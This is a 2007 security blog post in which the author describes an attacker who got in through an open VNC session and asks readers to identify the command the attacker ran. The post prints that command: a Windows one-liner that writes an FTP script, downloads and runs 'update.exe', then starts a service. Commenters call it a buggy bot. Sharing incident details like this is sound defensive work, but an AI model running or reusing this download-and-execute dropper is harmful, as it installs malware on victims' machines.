The Lazy Genius

Security News & Brain Dumps from Xavier Ashe, a Bit9 Client Partner

Anyone seen this?

Posted by Xavier Ashe on June 5, 2007

I've got a bastion hots that had vnc wide open.  I just got a connection.  It fired a ctrl-atl-del, opened a task manager, and ran cmd.exe.  It then executed the following command.  I was able to get a screen shot before the window disappeared, but it looked like the command was not successful.  The attackered disconnected immediately.  I have no extra users, but am downloading Helix right now to see if anything really happened.  I also have a pcap.  But does this look familiar to anyone?

cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij &echo binary >> ij &echo get update.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit
Advertisements

No Responses Yet to “Anyone seen this?”

  1. Anonymous said

    Are you sure the first part is correct? “net set 21 >> ij” does not make any sense, I would expect him to specify the ftp host there.

    Like

  2. Anonymous said

    Yeah… we have a screen shot of the attack. It looks like a buggy bot to me. NET SET is not a valid command on XP, and I don't think it's a valid command on any OS.

    Like

  3. Anonymous said

    Hi –
    I had something similar happen:
    http://adminspotting.net/blog/one-day-while-using-vnc.html

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: